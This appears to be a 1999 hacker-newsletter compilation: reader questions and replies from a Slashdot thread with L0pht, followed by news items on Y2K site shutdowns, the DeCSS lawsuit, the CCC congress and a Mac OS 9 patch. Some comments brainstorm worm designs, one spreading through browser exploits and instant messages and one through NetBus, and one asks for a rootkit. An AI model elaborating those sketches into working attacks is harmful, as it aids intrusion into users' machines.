(Score:1) by Omniscient Ferret (jyoung@cs-sun1.truman.edu) on Monday December 27, @01:01PM EST (#56) (User Info) http://cs-sun1.truman.edu/~jyoung/index.htm Er, that should be "love to have automated scanner". Welcome, our door is open (Score:2, Interesting) by lildogie on Monday December 27, @12:40PM EST (#47) (User Info) What do you think about the wisdom of linking a planetary network of desktop computers to a radio telescope, hoping to go online with any extra-terrestrial who cares to open our collective port? Little Dogie Internet Worm II (Score:4, Interesting) by tilly on Monday December 27, @12:43PM EST (#48) (User Info) Several months ago I began predicting that someday someone would find a buffer overflow in the various Windows TCP-IP stacks and use it to write a worm that would bring down the Microsoft part of the Internet and cause so much traffic as to effectively shut down everything else. I further predict that until an event of this magnitude happens, the general public will not really learn the basic lessons about security that the *nix world was forced to learn from the first worm. What are your thoughts on this prediction? (Timeline, reasonableness, etc.) Regards, Ben I miss the old InfoWorld forums. :-( Re:Internet Worm II (Score:1) by jesser on Monday December 27, @04:20PM EST (#144) (User Info) http://www.palosverdes.com/jesse/ windows 95 had at least one buffer overflow exploit.. one had to do with putting fragmented things together. was this hole exploitable for running arbitrary code or only for crashing the box? if the former, why wasn't there a worm? also.. as an idea for a worm.. how about a worm that opens up port 80 with enough code to exploit known security holes in various versions of msie and netscape plus some silly stuff to make it look innocent, and then IMs everyone (msnim, aim, icq, yahoo, etc) who's online and tells them to "look at your website"? it could also affect frontpage uploads... -- Warning: this sig attracts all other sigs with a force proportional to funniness and inversely proportional to distance squared. Re:Internet Worm II (Score:0) by Anonymous Coward on Monday December 27, @06:31PM EST (#164) 1. Think of this, Cisco/Bay and other routers running their own stacks, which have probably not been evaluated externally. what if one of them contains an overflow? not even the stack, every router has a few ports open, the code behind them could have problems aswell. 2. There is this nifty commeercial stack (I forgot the name) which is used in HPUX 11.x, and quite a few embedded and proprietary systems. who knows if it's been evaluated. even if a code has been evaluaded by people who do know their stuff, after all, these people are human, so, until such a stack doesn't get evaulated by 1million programmers across the planet, for at least a year, it couldn't be considered really safe, even then, see the latest Linux 2.2.12 and below 'blind spoofing' thing. Re:Internet Worm II (Score:2) by sinnergy (froggy@eecs.cwru.edu) on Tuesday December 28, @07:36AM EST (#207) (User Info) http://froggy.raex.com/ You make an interesting point. The problem is, though, that many Unix shops (the small to medium sized ones at least) don't know what the lessons were from the first Worm. I'm only 23 and I learned about it through lore more than anything else. For everyone's sake, I hope you're not right, but I do believe that a good dose of prevention and education would be in order for most of us Sysadmins. Convincing management of this necessity, though, is almost impossible. With focus more on the hear and now as opposed keeping an eye out for potential problems, it's hard to keep abreast of security technologies - CWRUton for Life - (sad but true!) Re:Internet Worm II (netbus) (Score:0) by Anonymous Coward on Wednesday December 29, @11:47AM EST (#232) Well, as 1% or 10% (or ??%) are infected by netbus installations, a worm could simply propagate from one netbus PC to the next. Would be the first worm using a trojan to propagate :-) George Security and Open Source (Score:0) by Anonymous Coward on Monday December 27, @12:44PM EST (#49) Do you believe that it is possible to provide a secure computing model in an open source environment? If so, how? Proper NT rootkit. (Score:3, Interesting) by Zurk (zurk@SPAMSUCKSgeocities.com) on Monday December 27, @12:51PM EST (#50) (User Info) Hi guys, Any plans to write a proper Win2K/NT rootkit (the kind that was published on Phrack a while back - that replaces or adds to the actual calls in the win32 ring 0 system with its own) soon ? Re:Proper NT rootkit. (Score:0) by Anonymous Coward on Monday December 27, @06:31PM EST (#165) You write one if you need it so badly, or goto www.rootkit.com, where kids like you can download such stuff. Re:Proper NT rootkit. (Score:0) by Anonymous Coward on Tuesday December 28, @03:50PM EST (#219) you cant get a ring 0 rootkit there or anywhere else dummy. Simple question (Score:1) by Ricochet (ncherry@dmc.uucp) on Monday December 27, @12:54PM EST (#51) (User Info) http://members.home.net/ncherry/ (First the silly question) Prove your existence :-) (Now the real question) How do we get back control of our information? Re:Simple question (Score:0) by Anonymous Coward on Monday December 27, @06:33PM EST (#166) 1. already proven, see them at DefCon, Blackhat and other places. 2. We never will, once it's out there, it's on the loose, like a wild animal. Security? (Score:1) by Raffy (rafe.digitaldiscipline@com) on Monday December 27, @12:55PM EST (#52) (User Info) http://www.digitaldiscipline.com Assume you own a server to run the following protocols: HTTP, POP/POP3, SMTP, NNTP, telnet, FTP. Can such a machine be secure under -any- OS? If this was sitting in your basement, what would you do with it (after loading Q3A/UT and distributed.net's latest client ;-) to make sure the script kiddies didn't f*ck with you? Rafe V^^^^V Opinions expressed by the author may not actually exist in the wild. Re:Security? (Score:2) by Chandon Seldon (acorn@gis.net) on Monday December 27, @03:23PM EST (#131) (User Info) http://www.calug.net/ Assume you own a server to run the following protocols: HTTP, POP/POP3, SMTP, NNTP, telnet, FTP. Can such a machine be secure under -any- OS? If this was sitting in your basement, what would you do with it (after loading Q3A/UT and distributed.net's latest client ;-) to make sure the script kiddies didn't f*ck with you? How I'd go about giving it maximum security. (Disclaimer: I've never actually set up a server running more than HTTP + FTP + POP3) 1.Partition the machine into the following partitions: / (ro) /home/httpd (ro if possible) /home/mail (rw) /home/news (rw) /home/ftpd (ro if possible) 2.Install the most recent version of OpenBSD 3.Install any security fixes 4.Remove distributed.net's latest client and Q3A 5.Create the following new users: httpd, pop3d, nntpd, ftpd, telnet, unperson, admin 6.Set the permissions for all the files on the machine as strict as possible. 7.Setup a program to forward all requests on ports below 1024 to ports 10000 through 11024. 8.Set each server as it's own user, and make sure that one user can't effect the files of another in any way. 9.Set up each server on standard_port+10000, and have them each store their files in their own partiton (mounted under /home) 10.Use the simplest, most secure server for each task. Yes, this means you can't use apache. 11.Don't allow telnet logins as anyone but admin. 12.Set up the admin account with the minimum set of privilideges nessisary to administer the machine. 13.Go "chown root /bin/chmod; chmod og-rwx /bin/chmod" 14."chmod a-x" any programs that aren't absolutey nessisary to the machine working, like 'su', 'chown', 'fortune', etc. 15.Change your root and admin passwords weekly. 16.Do anything that you should do that I missed. This should, at best, prevent anyone from messing with the machine at all. At worst, if someone does get in, they shouldn't be able to do anything - anything at all. -------- The act of censorship is always worse than whatever is being censored. -Chandon Seldon Re:Security? (Score:1) by Spamizbad on Tuesday December 28, @02:10AM EST (#201) (User Info) How about also getting rid of telnet and using Openssh (included with OpenBSD, no?). Mmm... 128bit encryption. Re:Security? (Score:0) by Anonymous Coward on Monday December 27, @06:34PM EST (#167) Many things can be done, this is not the place to discuss them, why don't you come up with something new? meanwhile, see the StackGuard/PointerGuard/openwall projects. Slint (Score:2, Interesting) by Emphyrio (emphyrio@rvdm.op.het.net) on Monday December 27, @12:58PM EST (#53) (User Info) http://rvdm.op.het.net According to your site, you have developed a quite powerful source code security analysis tool. A while ago, this tool was not distributable, and closed source. Do you plan on releasing Slint and/or other currently closed source L0pht tools in an open source license, or in some other freely distributable binary form ? Questions (Score:1, Interesting) by Anonymous Coward on Monday December 27, @01:00PM EST (#55) I've been checking out the 'L0pht' ever since the days when mudge posted the page up asking how many boxes everyone had up, but anyways... Is there any work still being done on the 'guerilla net' project? The page hasn't been updated in ages. Did you guys ever manage to locate the TX ready pin on the WaveLAN cards to switch the amplifier on? What happened to the user pages on www.l0pht.com? What are your main development platforms? ...And of course, what's the best piece of equipment you've dug out of the garbage so far? software liability (Score:0) by Anonymous Coward on Monday December 27, @01:08PM EST (#57) hi guys. when you testified before congress, one of you (I believe it was Weld Pond) said that software manufacturers need a financial incentive to ship secure software. I believe that you went on to say that they should be held partially liable for damages caused by bugs in their software. How do you think that legislation like that would affect the open source movement? Differences in interest (Score:1) by BlueCalx- (nickd@nickd.org) on Monday December 27, @01:11PM EST (#58) (User Info) http://nickd.org Sometimes, corporations are ignorant of your advisories, as they feel the general hacking community is only destructive and has little to offer. It also seems obvious in ABCNews' report that people have an inherent fear of the hacking/cracking community in general. The intent of some groups (cDc comes to mind) is different from others (gH), and as a result it becomes difficult to create an accurate definition of what hacking/cracking really is. My question is this: do you feel the negative publicity and stereotypes of hackers and crackers rubs off on l0pht to some extent? -- BlueCalx | http://nickd.org/ IPv6 (Score:0) by Anonymous Coward on Monday December 27, @01:12PM EST (#59) Hi. Lots of companies are shipping "VPN" solutions that are simply IPv6 boxes. Do you feel that IPv6 is adequate for this purpose? Will IPv6 really prevent the types of attacks we've seen with IPv4? Please reply to this! (Re:IPv6) (Score:1) by dibos (krooger@debian.BLOCKSPAM.org) on Monday December 27, @06:41PM EST (#172) (User Info) http://master.debian.org/~krooger Good question. I have heard that IPv6 is as insecure as IPv4; I'd like to know more about that. A Question of Principle (Score:2, Interesting) by sudog on Monday December 27, @01:12PM EST (#60) (User Info) I was not impressed to see L0pht embrace any form of commercial philosophy. While it is true I live in a fairly isolated section of the world, I and the community I live within have the general impression that you are no longer available to the public. It appears as though you have sequestered yourselves away in your building(s) and sent Mudge out to maintain good PR. What I mean is, aside from the odd security release and product update, you guys seem to have disappeared from the face of the earth. What are you up to? Are you still truly pursuing the tenet that is listed prominently on your BBS? "Freedom, freedom, blah" -lhi, psalm blah verse blah? Do you see yourselves as this inaccessible except to people willing to fork over large dollars, or am I just living on the moon? Re:A Question of Principle (Score:1) by God I hate mornings (dj_batt at worldnet dot att dot net) on Monday December 27, @01:37PM EST (#80) (User Info) I don't think that they're pursing the all mighty dollar. I have contacted them serveral times with hopes of getting them to do some security work for various clients of mine. All had the potential for very nice paychecks at the end. They refused the work, very politly tho. SO I think you might be a bit off base. But I could be wrong. GIHM -The light at the end of the tunnel is only the oncoming train. Capabilities in Linux (Score:1) by Nemesys on Monday December 27, @01:13PM EST (#61) (User Info) Hi - this is a specific question. Do you think we'll see capabilities begin to replace root in Linux? What will that world be like? When will it happen? Re:Capabilities in Linux (Score:0) by Anonymous Coward on Monday December 27, @06:37PM EST (#168) It will take a long *long* time before such a thing fully merges into the Linux tree. Meanwhile look at www.eros-os.org and pray for them to complete it. If you're really interested, search for documentation on Boeing SNS and Honeywell SCOMP. OpenBSD (Score:0) by Anonymous Coward on Monday December 27, @01:14PM EST (#62) How secure do you feel linux is? Please compare or contrast this with OpenBSD. Re:OpenBSD (Score:0) by Anonymous Coward on Monday December 27, @06:39PM EST (#169) A lot less, see what the OpenBSD kernel has to offer in terms of security. The usermode code has been also reviewd and made stronger. much less code, more eyes watching it, the result, better security. Reply to this letter. (Score:5, Funny) by An0nymousC0ward (president@whitehouse.gov) on Monday December 27, @01:14PM EST (#63) (User Info) http://www.slashdot.org This letter was recently published in the columbus dispatch (Ohio's greatest home newspaper....yea right). What would your response be to this person? Letter to the editor: Opening windows could let bad guys do a lot of damage Saturday, December 25, 1999 I was amazed to see that the Clinton administration, in its initial victory over Microsoft, wants the source code to Windows to be made public. I'm sure it will follow up with a demand that all banks publish the combinations to their safes and freely distribute keys to both their front and back doors. Perhaps they will make banks install a large button so visitors can disable all alarms. Making the world safe for bank robbers would be a lot better than making Windows' source code public. The year 2000 problem is nothing compared to what a hacker could do with the code to Windows. The anti-virus software today depends on two primary tests to find a virus: the Cyclic Redundancy Checksum and file size. A virus attaches itself to a program and runs when the program runs. Rather than get into a complex technical discussion, let us just say every computer file has a fingerprint. If a virus is attached, the file's fingerprint changes. An anti-virus program just looks for the fingerprints left by the virus. However, if one has the source code to Windows, a file with a virus can be made with the same fingerprint as a file without the virus. Even worse, the operating system, instead of being the virus cop, becomes the virus enabler. Imagine a world where half the people in uniform are trying to rob you and where dialing 911 brings a band of serial killers to your door. Such a virus would be very, very difficult to fight. Police try to catch such people by tracing who benefits. But when the goal is revenge and not profit, it gets tough to catch the bad guys. If you think catching the Unabomber was time consuming, this would make the search for the Unabomber look very fast, indeed. So with the Windows source code, the hacker could write a program that on June 1, 2001, swaps all bank balances. Someone whose name starts with an A gets Z's balances. Throw credit cards into that mix, and there could be real fun. Maybe some hacker would find it fun to pay off everyone's property taxes. I'll bet everyone who had not paid his tax would tell the truth and pay up voluntarily, wouldn't they? Every programmer I have ever met has always left himself a back door into every system he writes. Does anyone want to bet Microsoft does not have a back door to its software? Does anyone believe that if the judge makes Microsoft publish the source code, Bill Gates would remove the back door before publishing it? He would not dare. The judge might put him in jail for modifying the code. Couldn't have that now, could we? If he would leave it in, every highly skilled programmer would have a key to everything running on Microsoft software. We can rest assured that every hacker is totally honest, can't we? And with the Internet, those hackers would all be in places where Americans are loved, such as Belgrade, Yugoslavia, and Baghdad, Iraq, for example. Some hacker might even have fun with a newspaper, such as removing the names of everyone who is a subscriber and replacing them with the names of people who are not. Did I mention court records, employment records, child support records? All Microsoft bashers in and out of government should beware. It looks like they are going to get what they wished for. Ray Malone MBS Software Chillicothe, Ohio a real zero. Re:Reply to this letter. (Score:0) by Anonymous Coward on Monday December 27, @02:34PM EST (#114) I'd call him an idiot and get on with things. Re:Reply to this letter. (Score:0, Offtopic) by BiLlCaT (neo_at_jay_pee_jay_dot_net) on Monday December 27, @03:27PM EST (#132) (User Info) http://www.jpj.net/~neo i blew stewart's threw my nose when i read this. as if anyone could (or would want to) analyze the source for windows. holy christ... just look at the mozilla project. of course the code to MS's TCP stack might be fun to tinker with (not). l8r. --bc @HWA 25.0 AirForce to Close Web Sites Over Y2K ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Instead of properly securing public access systems and remaining vigilant over the New Years holiday the Air Force has decide to retreat and deny the public its right to information. Fearing online attacks over the upcoming holiday they have decided to shut down some public web sites which they hope will protect them from attack. (Your web site will have the same holes on New Years day as it will the day after.) Associated Press - via Yahoo http://dailynews.yahoo.com/h/ap/19991228/tc/y2k_military_web_sites_1.html Tuesday December 28 2:41 AM ET Air Force To Close Some Web Sites By JAMES HANNAH Associated Press Writer DAYTON, Ohio (AP) - Fearing attacks by computer hackers, some Air Force bases plan to block access to their public World Wide Web sites over the New Year's weekend, officials say. Others bases have been asked to consider closing down their sites temporarily. ``Each one of the Web masters were told they might want to consider any vulnerabilities,'' Maj. John Anderson, an Air Force spokesman at the Pentagon, said Monday. For some, he said, that means blocking access at a prime time for Internet pranks. Timothy Conley, deputy director of the 88th Communications Group at Wright- Patterson Air Force Base in Dayton, estimates there are about 30 public Web sites maintained at the base - from pages for the United States Air Force Museum to the Air Force Institute of Technology. The concern, he said, is that hackers emboldened by widespread Y2K computer concerns could insert viruses that would alter or destroy information on the sites. ``We feel they may plant some things on servers or e-mail that might go off after (Jan. 1),'' Conley said. He said there is no threat to national security because the public-access sites are separated from secure sites, which will remain operational. The Pentagon's main Web site should stay operational over the weekend, said spokeswoman Susan Hansen. Even so, officials there have voiced concern about attacks from cyberspace, and say special precautions will be taken. Each of the military services has its own network monitoring stations, and a centralized Pentagon network monitoring system has been set up in Arlington, Va. Jim Neighbors, manager of the Air Force's Y2K program, said any attacks on the Air Force sites would amount to a nuisance. ``I liken it to somebody going in and defacing a wall with a can of spray paint, '' he said. @HWA 26.0 Sweden Plans Cyber Defense and Attack Force 12/28/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by erewhon The Swedish government has issued orders for the armed forces to train cyber soldiers to protect the nations infrastructure from attack as well as destroy hostile systems. (Once again the mainstream media is months behind the times. HNN reported on this story back in July.) Associated Press - via Washington Post http://www.washingtonpost.com/wp-srv/aponline/19991227/aponline101858_000.htm (Sorry, link provided a 404 - article unavailable. - Ed) HNN Archive for July 14, 1999 http://www.hackernews.com/arch.html?071499#3 @HWA 27.0 DVD Industry Files Lawsuit Over DeCSS 12/29/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue As reported yesterday by HNN the DVD industry has filed suit in Santa Clara Superior court against numerous people (many to be named later) for posting or even linking to DeCSS. DeCSS is software that can unlock the encryption scheme for DVD disks which can then be used to view your movies on your computer it could also be used to illegally copy DVDs. Wired http://www.wired.com/news/business/0,1367,33303,00.html ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2414488,00.html?chkpt=zdnntop Washington Post http://www.washingtonpost.com/wp-srv/WPlate/1999-12/29/026l-122999-idx.html HNN's copy of the legal complaint http://www.hackernews.com/special/1999/dvdinjunction.html DeCSS Defense Site http://www.lemuria.org/DeCSS/ DVD Copy Control Association http://www.dvdcca.org/dvdcca/index.html The legal angle of the DVD Industry's case will hinge on exactly how the DeCSS software was created and whether it was truly reverse engineered and if there was intent to cause harm to the industry. Wired http://www.wired.com/news/technology/0,1282,33311,00.html The hearing has been scheduled for December 29, 1999, at the Superior Court of the State of California, County of Santa Clara to determine if a temporary restraining order should be granted against the named defendants. PZ Communications http://www.pzcommunications.com/decss/main.htm @HWA 28.0 No Evidence of Y2K Viruses or Cyber Terrorist Attack 12/29/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The National Infrastructure Protection Center has said that they have no evidence pointing to a wide scale cyber attack and so far no serious virus threats have been discovered. NIPC has said that it does not expect large-scale U.S. infrastructure disruptions. NY Times - Registration required. Just give 'em a fake address. http://www.nytimes.com/library/tech/99/12/biztech/articles/29secure.html December 29, 1999 Experts Play Down Virus Threat to Computers Over the Holiday By JOHN MARKOFF AN FRANCISCO, Dec. 28 -- Though still maintaining a nervous vigilance, computer security experts in the government and private sectors said today that almost no evidence had yet materialized that hackers or terrorists were plotting widespread disruption of computer networks over the New Year's weekend. Since midsummer, concern has been raised, sometimes with a tone of alarm, that cybercriminals and political terrorists would mark the rollover to the new millennium by planting various kinds of malicious software in networks and computer systems. However, very little evidence of such activity has emerged in recent weeks, and today the Government's National Infrastructure Protection Center said that it expected no "large-scale U.S. infrastructure disruptions" from Year 2000, or Y2K, computer failures during the next few weeks. Moreover, because of greatly heightened surveillance that is planned for computer networks around the globe on New Year's Eve and the following days, many experts say that now would actually be the worst time to try an attack. Nevertheless, the federal agency also said it was preparing for a possible increase in criminal activity, in part because of heightened media attention to Year 2000 threats. The agency identified four viruses that it said were of particular concern. The first three, known as Microsoft Word macro viruses, use a programming language inside the word processing program to spread through networks. The fourth, identified as PC CIH, is an older program that can seriously damage infected machines. And yesterday an administration official said that despite the fact that no widespread attacks were expected there is still concern about the potential for damage from malicious programs. "The criminal element has latched on to cyberintrusion as a good avenue," said the official, who spoke on the condition that he not be identified. "Obviously, this is an issue of concern." Kathy Fithen, manager of the Computer Emergency Response Team Coordination Center at Carnegie-Mellon University, said: "Right now we're not seeing anything out of the ordinary. For Jan. 1, the biggest thing we anticipate is computer viruses that have targeted that date to execute." Last week, the Government official in charge of protecting the nation's electronic infrastructure said he knew of no documented cases in which malicious software had been implanted during efforts to fix Year 2000 errors. Earlier this year, various experts had voiced concerns that in the frenzy to make repairs to software, a few rogue programmers hired as temporary workers might secretly build in "back doors" that could later be exploited by criminals to invade networks without setting off computer security systems. In July, the Gartner Group, a computer consulting and market research firm, predicted at least one theft of $1 billion next year directly resulting from this year's repairs. The threat alone can be costly. Even if would-be intruders fail to exploit such a back door, an organization that suspects that its software has been compromised must assign its best engineers to systematically examine enormous amounts of code for tiny, hard-to-find alterations. Bruce Schneier, president of Counterpane Internet Security Inc. in San Jose, Calif., said such back-door attacks had been extremely rare, and last week, Richard A. Clarke, the president's national coordinator for computer infrastructure security and counterterrorism, said the government had not documented a single such security breach. This week, Gartner Group's computer security experts acknowledged a lack of evidence for secret back doors. "I've heard lots of stories," said William Spernow, the research director for Gartner's information security strategies group. "But when I have asked for the code, I've gotten nothing." One computer security firm that has assessed the added risk from Year 2000-related viruses and security attacks estimated that the odds of a major "virus event" for the period were about 1 in 14, or 7 percent. The firm, ICSA.net, also placed odds of a single attacker breaching 100 or more computer sites over the weekend at 9 percent. Several antivirus software companies today said that while they would not rule out the possibility of a widespread destructive event over the weekend, they had not seen evidence of such viruses yet. "Nothing happened over Christmas, which may be a pretty good indication that nothing major will happen on Jan. 1," said Vincent Gullotto, director of the anti-virus emergency response team at Network Associates, a Silicon Valley software publisher. @HWA 29.0 Pentagon and Others Take Air Force Lead and Shut Down Sites 12/29/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid The Pentagon and the federal personnel agency will be taking the Air Forces lead and will be shutting down some of their public web sites over the new year thereby denying US citizens of their right to access public information. Fearing a massive 'hacker attack' the agencies have decided it is better to shut down the sites than repair any possible damage later. (If your web site is vulnerable today it will be vulnerable tomorrow. This tells me that you are not confident enough in your own web sites ability to fend off attack but you expect the American public to remain calm during the Y2K rollover.) Associated Press http://dailynews.yahoo.com/h/ap/19991228/tc/y2k_national_9.html Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/19991228/wr/yk_hackers_2.html AP: Tech Headlines Add to My Yahoo! Tuesday December 28 7:17 PM ET Military Closing Web Sites for Y2K By TOM RAUM Associated Press Writer WASHINGTON (AP) - Taking last-minute precautions, the Pentagon and the federal personnel agency are shutting down some of their public Internet sites this weekend to keep them safe from computer hackers as the calendar rolls over to 2000. And the Department of Veterans Affairs has decided to mail January benefit checks to more than 2.5 million veterans on Dec. 30, a day early, to avoid potential delays related to the Y2K computer bug, officials disclosed Tuesday. The early mailings ``will mitigate unexpected year 2000 interruptions of benefit payments arising from anything outside our control,'' VA spokesman Terry Jemison said. The Social Security administration announced last week that checks and electronic deposits for 44 million elderly and disabled Americans also would be dispatched for delivery a day early. Y2K-compliant files for electronic Social Security payments will be at banks by Dec. 30 rather than the usual Dec. 31. Checks will be mailed earlier as well. Most people normally would receive Social Security benefits on Jan. 3. While making some last-minute adjustments, the government continued to sound a note of optimism about the country's readiness. The nation's top health official said people are not hoarding drugs so there will not be any shortages of medicine over New Year's. ``Americans have used common sense,'' Health and Human Services Secretary Donna Shalala said, citing a 60-90 day supply for nearly every category of medicine. Federal officials also expressed confidence about 911 calls going through and public safety officials being able to dispatch services. But they advised Americans to keep emergency numbers on hand. ``There was a way to call the police, to call ambulance services, long before 911,'' Federal Communications Commissioner Michael Powell said. Some problems, particularly overseas, may not become evident for weeks. And those that show up Jan. 1 in early time zones may not be a good predictor of what the United States can expect, according to Bruce McConnell, director of the United Nations International Y2K Cooperation Center. Some of the government's emphasis switched from potential computer glitches - nearly all of these have been fixed, officials insist - to the threat of cyber attacks. Many military installations around the country will be shutting down their Web sites temporarily as a safeguard against intrusions - as well as a protection against Year 2000 viruses that might be launched on New Year's Eve. ``Within some defense agencies, they have thought the most prudent action was just to take their sites offline,'' said Pentagon spokesman Adm. Craig Quigley. While the Pentagon intends to keep its central Web site - www.defenselink.mil - in operation, Quigley said one site being temporarily blocked is that of the Defense Finance and Accounting Service, which oversees military pay. ``We're going the extra mile to make sure our people's pay isn't affected,'' Quigley said. Also being taken offline this weekend: the Web site maintained by the Office of Personnel Management, which services the rest of the government payroll. Susan Hansen, a Pentagon spokeswoman who deals with Y2K issues, said officials felt it was important to keep the main ``DefenseLink'' site up because ``that's how we will be transmitting information during the rollover.'' She said special precautions were taken to secure the site. Bases temporarily closing their Web sites include Wright-Patterson Air Force Base in Dayton, Ohio. About 30 public sites are maintained at the base, including Web pages for the United States Air Force Museum and the Air Force Institute of Technology. ``We feel they (hackers) may plant some things on servers or e-mail that might go off'' after the New Year begins, said Timothy Conley, deputy director of the 88th Communications Group at Wright-Patterson. He said there is no threat to national security because the public-access sites are separated from secure sites, which will remain operational. The commandant of the Marine Corps., Gen. James L. Jones, canceled weekend travel plans, although aides said the changes were family-related and not prompted by fears of Y2K disruptions. Capt. Pete Mitchell, a spokesman for the corps, said the Marines were taking various steps to make sure there is a ``seamless transition'' to 2000. ``It is a network security issue as much as it is a Y2K issue,'' said Mitchell. ``All the branches are beginning to do things to restrict, to limit the risks of intrusion by decreasing electronic footprints.'' In addition to tracking stations set up by each service, a centralized Pentagon network monitoring system has been set up. As for civilian communications, industry and federal leaders reiterated their caution against people picking up the phone just to see if it is working or dialing 911 just to check it. Too many callers at once could clog the network, meaning some might get a fast busy signal. But that wouldn't necessarily indicate any Y2K-related problems, said the FCC's Powell. ``This is a basic network congestion issue that we see every Mother's Day. This is Mother's Day on Viagra,'' he said. The nation's largest telephone companies have said for months that their networks are ready. But officials say they have more limited information on international calling and smaller, rural U.S. phone companies. Yahoo: Tuesday December 28 9:46 PM ET U.S. Air Force Cautions Web Sites on Y2K Hackers WASHINGTON (Reuters) - The U.S. Air Force has given its 900 public Web site managers permission to shut down the sites around the New Year to guard against computer hackers, an Air Force spokesman said on Tuesday. ``There is no specific threat, it's simply heightened security. If you're not up on the 31st, there is nothing they (hackers) can do about it,'' said spokesman Maj. Andree Swanson. The message was delivered to the public Web site operators inside the Air Force, the people who run facility and base Web pages. None of the sites contains classified information. ``These decisions on whether to shut down or not is up to the individual Web site,'' Swanson said. The main Air Force page -- www.af.mil -- has no plans to close this weekend. ``They all have the option to shut down, but it's not mandatory. Some sites are more secure than others,'' Swanson said. Hackers have invaded Air Force Web sites in the past, she said, noting that many such attackers are looking to make a name for themselves. President Clinton's top aide on Y2K matters earlier this month asked computer hackers to exercise self-restraint until after Year 2000 technology fears have passed. Y2K concerns revolve around computer systems programmed to read only the last two digits of a year. If left uncorrected, it is feared systems will read 2000 as 1900, causing widespread malfunction. Adding to the anxiety are worries that hackers will take advantage of possible Y2K confusion to pierce computer security defenses. @HWA 30.0 More from CCC Congress in Germany 12/29/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime As the latest Chaos Computer Club Congress goes into full swing during its second day Wired reporter Steve Kettmann issues his report. (I'm gonna hafta get over there one of these years.) Wired http://www.wired.com/news/culture/0,1284,33312,00.html Chaos Computer Club http://www.ccc.de/ Chaos Hackers Seek Order by Steve Kettmann 3:00 a.m. 29.Dec.1999 PST BERLIN -- Even if media-hyped panic over how computers will handle the Y2K changeover gets people worked up over nothing, the world could still be a better place as a result. That, at least, was the impression emerging midway through this week's three-day Chaos Computer Club hacking congress here. The renowned visionaries of the CCC believe that technology matters a great deal in our lives, much more than most people believe, and are pleased to see the rest of the world catching up. "The world is being reminded of how reliant on technology we are," said CCC leader Frank Riegr. "Even if nothing happens, we will know more about how technology and society are intertwined. Fortunately, in Germany there hasn't been much talk about hackers doing evil, the way there has in the United States. We have a very good standing here." German politicians seek out CCC members as advisers: Club members gather to take on the big questions, too, not just to share tips on issues like "Buffer Overflows" -- the actual title for a Tuesday morning session at the congress. No facet of the intertwining of society and technology is as dramatic as Tuesday's big theme -- the expanding reach of government surveillance, popularized in American movies like Enemy of the State. One early-afternoon workshop urged people to cooperate in a project to map all the surveillance cameras in Kologne, and ultimately Germany. British signal intelligence expert and journalist Duncan Campbell gave an address on the extent world governments spy on each other -- and the rest of us, too. Campbell described in detail the system of ground-based listening stations called Echelon that enables the US and British governments to intercept transmissions -- and, most important, sort the data, earmarking what receives closer scrutiny and filtering out what is to be ignored. The European parliament is so concerned about Echelon -- whose existence is still officially questioned -- that it commissioned a report from Campbell and set hearings for this coming February. It's vindication for Campbell, who has sounded the alarm over government intrusion into privacy for decades, since first writing about the British version of the US National Security Agency in 1976. "This is really his finest hour," said Rop Gonggrijp, a hero to European hackers for organizing the 1997 outdoor hacker camp HIP. "A lot of people can see now that he wasn't just being paranoid when he said a lot of this 20 years ago. "It's hard to come to terms with the fact that so many people don't believe this is going on. You may have an idea about the scale of what your government does, but you have to sort of ditch all of what you thought you knew. Even people who have nothing to fear should be aware of this because it will give you an idea of how the world really works. All major wars have a signal intelligence component." Campbell believes that government agencies like the NSA, featured in 1998's Enemy of the State, are moving more in the direction of monitoring email and fax transmissions. "Certainly it's unbelievable that they would make so major an investment unless they are confident of getting into the big fiber-optic cables that will be the backbone of planetary communication in coming decades," he said. "Enemy of the State both helped and hurt," Campbell added. "It helped because it raised consciousness, but it hurt because it was off the wall. It creates an impression of surveillance that's quite obviously not possible. But that's Hollywood. "It's a very difficult area for people to understand and believe. Awareness is growing exponentially, first in Europe and also in the United States. The NSA will survive. But they are going to face a big shakeup. This creates the possibility that they can also be shaken up in areas that lead to the protection of privacy." @HWA 31.0 Apple Patches OS 9 Security Hole 12/29/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue A hole in the TCP/IP protocol stack on MacOS 9 could leave users systems open to launching a distributed attack without the users knowledge. MacOS 9's networking software, Open Transport, will automatically respond to certain data packets by triggering numerous machines an attacker could overwhelm a target site creating a denial of service attack. Apple released a patch within hours of notification. (And during the holidays as well, yeah Apple.) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2414764,00.html?chkpt=zdnntop C|Net http://news.cnet.com/news/0-1003-200-1508646.html?tag=st.ne.1002.thed.1003-200-1508646 Open Transport Tuner 1.0 http://asu.info.apple.com/swupdates.nsf/artnum/n11559 ZDNet; Apple patches OS 9 security hole Responding to security alerts, Apple has released a patch for Mac OS 9 to prevent hacks of networked Macs. By Dan Turner, MacWEEK.com December 28, 1999 5:59 PM PT Apple Computer Inc. late Tuesday released a patch for Mac OS 9's Open Transport networking protocol to correct a "flaw" that leaves Macs vulnerable to hackers who could enlist the computers over an Internet connection in distributed denial-of-service (DOS) attacks without the users' knowledge. The flaw was discovered by Professor John Copeland of the Georgia Institute of Technology, who heads that school's School of Electrical and Computer Engineering. Only Macs that are running Mac OS 9 and are attached to "always-on" Internet connections, such as digital subscriber lines (DSLs) and cable modems, are vulnerable, Copeland said. In an advisory from Carnegie Mellon University's computer security center, Apple acknowledged earlier today that it "reproduced the problem" and was "moving quickly to put a solution in place." Hours later Apple posted the patch, Open Transport Tuner 1.0, on its Software Updates Web page. Copeland told MacWEEK that attackers can "scan" cable or DSL networks 